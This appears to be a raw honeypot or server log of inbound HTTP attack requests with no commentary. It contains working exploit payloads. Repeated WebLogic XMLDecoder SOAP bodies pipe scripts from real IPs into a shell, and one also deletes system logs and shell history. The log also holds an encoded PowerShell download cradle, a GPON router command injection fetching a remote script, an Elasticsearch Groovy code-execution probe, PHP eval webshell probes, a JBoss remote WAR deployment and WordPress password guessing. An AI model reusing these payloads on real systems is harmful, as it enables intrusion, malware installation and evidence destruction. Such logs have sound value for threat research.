User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /db_session.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 48
eval=die('Hello, Peppa!'.(string)(111111111*9));
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 19
Cache-Control: no-cache
log=172&pwd=1722014
POST /db.init.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32
eval=die((string)(111111111*9));
POST http://check.proxyradar.com/azenv.php?auth=149408915993&a=PSCMN&i=1082769359&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
ÅpÈ!3Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îHY›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å
⁄SÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞îìFY›∆√«∆fl
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
Content-Length: 409
Host: x.x.x.x:9200
Connection: Keep-Alive
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å%ÑlhÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î¯+Y›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Ÿ√ßÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îr\0Y›∆√«∆fl
POST http://f3.mi-stat.gslb.mi-idc.com/diagnoses/v1/report HTTP/1.1
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.4; MI 4LTE MIUI/V7.00.55.00.KXDMICI)
Host: f3.mi-stat.gslb.mi-idc.com
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Type: application/x-www-form-urlencoded
Content-Length: 516
n=98134312514971&d=HCgAGAAYABgAABgHaHR0cGFwaRwYB2h0dHBhcGkYATAYFjQuNC40LVY3LjAuNS4wLktYRE1JQ0kYDG1vYmlsZS1IU1BBKxgPMTE0LjEyNC4yMDcuMjUyHBgG5Zu95aSWGAbljbDlsLwYABgAABocGBNhcHAuY2hhdC54aWFvbWkubmV0GTwYE2FwcC5jaGF0LnhpYW9taS5uZXQVABUCFvzJARUAGwAAGA01NC4yNTUuMTg0LjE2FQIVABYAFQAbAYUWU29ja2V0VGltZW91dEV4Y2VwdGlvbgIAGA40My4yMjQuMjQ3LjE2OBUCFQAWABUAGwGFFlNvY2tldFRpbWVvdXRFeGNlcHRpb24CAAAYD2NvbS54aWFvbWkueG1zZhgPY29tLnhpYW9taS54bXNmGBY0LjQuNC1WNy4wLjUuMC5LWERNSUNJAAA%3D&t=1494506028345&s=FDA6AF2A7BD99ECB9F41618756C237C1
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 25
POST http://check.proxyradar.com/azenv.php?auth=149415140129&a=PSCMN&i=1082784101&p=80 HTTP/1.1
Cookie: testCookie=true
Host: check.proxyradar.com
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0)
Referer: https://proxyradar.com/
Content-Type: application/x-www-form-urlencoded
Content-Length: 13
Connection: close
testPost=true
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
Content-Length: 1673
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.9.1
Connection: keep-alive
content-type: text/xml
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3"> <void index = "0"> <string>cmd</string> </void> <void index = "1"> <string>/c</string> </void> <void index = "2"> <string>unset; rm -rf /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; touch /var/run/utmp /var/log/wtmp /var/log/lastlog /var/log/messages /var/log/secure /var/log/xferlog /var/log/maillog; unset HISTFILE; unset HISTSAVE; unset HISTLOG; history -n; unset WATCH; export HISTFILE=/dev/null; export HISTFILE=/dev/null; wget http://93.174.93.149/logo8.sh -O /tmp/logo8.sh; curl -o /tmp/logo8.sh http://93.174.93.149/logo8.sh; lwp-download http://93.174.93.149/logo8.sh /tmp/logo8.sh; bash /tmp/logo8.sh; rm -rf /tmp/logo8.sh; history -c</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/></soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0
Connection: Close
Content-Type: text/xml
Content-Length: 1195
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_131" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index="0">
<string>cmd.exe</string>
</void>
<void index="1">
<string>/c</string>
</void>
<void index="2">
<string>Start /Min PowerShell.exe -NoP -NonI -EP ByPass -W Hidden -E JABPAFMAPQAoAEcAVwBtAGkAIABXAGkAbgAzADIAXwBPAHAAZQByAGEAdABpAG4AZwBTAHkAcwB0AGUAbQApAC4AQwBhAHAAdABpAG8AbgA7ACQAVwBDAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE4AZQB0AC4AVwBlAGIAQwBsAGkAZQBuAHQAOwAkAFcAQwAuAEgAZQBhAGQAZQByAHMAWwAnAFUAcwBlAHIALQBBAGcAZQBuAHQAJwBdAD0AIgBQAG8AdwBlAHIAUwBoAGUAbABsAC8AVwBMACsAIAAkAE8AUwAiADsASQBFAFgAIAAkAFcAQwAuAEQAbwB3AG4AbABvAGEAZABTAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwAxADEAMQAuADIAMwAwAC4AMgAyADkALgAyADIANgAvAGkAbQBhAGcAZQBzAC8AdABlAHMAdAAvAEQATAAuAHAAaABwACcAKQA7AA==</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å™≈˜[Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞î´5Y›∆√«∆fl
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å«™›^Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îVJY›∆√«∆fl
POST /login.action HTTP/1.1
User-Agent: Mozilla/5.0
Accept: */*
Content-Type: application/x-www-form-urlencoded
Host: x.x.x.x
Content-Length: 395
Expect: 100-continue
Connection: Keep-Alive
POST /xx.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
axa=die('Hello, Peppa!'.(string)(111111111*9));
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wp-login.php HTTP/1.1
Referer: http://x.x.x.x/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: x.x.x.x
Content-Length: 21
Cache-Control: no-cache
log=admin&pwd=!@#$%^&
POST /GponForm/diag_Form?images/ HTTP/1.1
Host: x.x.x.x:8080
Connection: keep-alive
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Hello, World
Content-Length: 118
XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=;wget+http://185.62.190.191/r+-O+->/tmp/r;sh+/tmp/r&ipv=0
POST /wuwu11.php HTTP/1.1
Host: x.x.x.x:80
User-Agent: Mozilla/5.0
Connection: Close
Content-Type: application/x-www-form-urlencoded
Content-Length: 23
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å∂0B÷Ã≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·
∞î?1Y›∆√«∆fl
POST /web-console/Invoker HTTP/1.1
Host: x.x.x.x:8080
Accept-Encoding: identity
Content-Length: 574
Connection: keep-alive
Content-Type: application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:41.0) Gecko/20100101 Firefox/41.0
¨Ìsr.org.jboss.console.remote.RemoteMBeanInvocation‡O£ztÆç˙L
actionNametLjava/lang/String;[paramst[Ljava/lang/Object;[ signaturet[Ljava/lang/String;LtargetObjectNametLjavax/management/ObjectName;xptdeployur[Ljava.lang.Object;êŒXüs)lxpsr java.net.URLñ%76¸‰rIhashCodeIportL authorityq~Lfileq~Lhostq~Lprotocolq~Lrefq~xpˇˇˇˇˇˇˇˇtjoaomatosf.comt/rnp/jexws3.warq~ thttppxur[Ljava.lang.String;≠“VÁÈ{Gxpt java.net.URLsrjavax.management.ObjectNameßÎmœxpt!jboss.system:service=MainDeployerx
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /_search?pretty HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Accept-Language: zh-CN
Referer: http://x.x.x.x:9200/_search?pretty
User-Agent: Java/1.8.0_31
Content-Length: 409
Host: x.x.x.x:9200
{"size":1,"script_fields": {"exp": {"script":"java.lang.Math.class.forName(\"java.io.BufferedReader\").getConstructor(java.io.Reader.class).newInstance(java.lang.Math.class.forName(\"java.io.InputStreamReader\").getConstructor(java.io.InputStream.class).newInstance(java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"echo qq952135763\").getInputStream())).readLines()","lang": "groovy"}}}
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 424
Cache-Control: no-cache
EK0NldLKYsr+W5poEXPtZmniPo64WxzpovppRI3AjlACNprkmVfNzMiR2kfdQFdfAIPHMc20CiHHHlldIEug1evvG6S4RogtClqB0FCLka6ZVKLBgY4coWHH/eVor7Cs4Dj8anEPohpjyvCpocuoiaIaWIBPI3nmHH+Vw6KNInf1CPzO0+hZBd0Yrq2vW3DryVmWMlsvBvNkahVaFASANY23e8IPO4cgMjn+np6xiqKfYOlZfCWglL01D4Z1Y4aiCES9tMfEDIxnfLRm2CpNSlenJANJb03tMCbnfovI/vSDhGUtaSVl2TAvbJTHbPy7BDMPQGwCjDx14MUpaHgXAchAnpgK83Z7VTswrySX4Azkt8YgSsAIaCWEoNduIEXLB4IHehFUCIruXeFqySsghQxZUYQZI/35ltwDi5b+
POST /wp-login.php HTTP/1.1
Referer: http://jamesatchue.com/wp-login.php
Accept: */*
Accept-Language: zh-cn
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; 125LA; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
Host: jamesatchue.com
Content-Length: 23
Cache-Control: no-cache
log=admin&pwd=123456789
POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: x.x.x.x
Content-Length: 444
Cache-Control: no-cache
QqZdxd2eNgHzsIJfTdCvn9BtrEc3QgEDL+RhMgC+zcb+3BqTeaccXPoTwyRa/3a1WyU6LOQYDNBhGdP+fzkfWcSpHuuTkJ9XYF+aqTdoJi9DS88NzZ0FDRPQIsU7ktuLY6TOJp7WEcGvQ8b15+w9l7QWHX4e5/fCc2y5lOdJy9upm3eLnLfVBBSKYAGMT87TU/ZkAauqknhTmSUtvQQHqMCn0EKobd+V9P+jjyvK9leZ8kI3DPmQU3CU4j2DpFIapIPr3izEM6sBiOVpSao1mAb4b6WafmUA1ajs6evEK+p4MpVeE22IX15rKDW+AVay9ifl/XAPDwP8QjNliFymnMHg1NXXEZ39WbrPqK8VuOTFc3ZY2XV9oEbwUjDNo3p3j3dVjanKMh6wAl3QPQD9YhxCkEEztW2xZIBUtpPE36Ux8D1Bo/CGTEG4sw==
POST http://infoc2.duba.net/c/ HTTP/1.1
Content-Length: 129
Host: infoc2.duba.net
Connection: Keep-Alive
User-Agent: Apache-HttpClient/UNAVAILABLE (java 1.4)
Å˙PbÃ≈*ÄH!O“§∞î˛º¶º¶º·Ê•¡Ã∏–·ÈÁ·≈¡®ºƒ‹ÕΩÎÏπºÓ∏±∏s≈¡®ºƒ‹Õ–·ÈÁ·∞îÏY›∆√«∆fl
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
POST /wls-wsat/CoordinatorPortType11 HTTP/1.1
Host: x.x.x.x:7001
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36
Content-Length: 556
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/"> <soapenv:Header> <work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/"> <java> <void class="java.lang.ProcessBuilder"> <array class="java.lang.String" length="3"> <void index="0"> <string>/bin/bash</string> </void> <void index="1"> <string>-c</string> </void> <void index="2"> <string>curl http://94.250.253.178/logo8.sh | sh</string> </void> </array> <void method="start"/> </void> </java> </work:WorkContext> </soapenv:Header> <soapenv:Body/> </soapenv:Envelope>
post /_search?pretty HTTP/1.1
User-Agent: Java/1.8.0_31
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Type: application/x-www-form-urlencoded
Accept-Language: zh-CN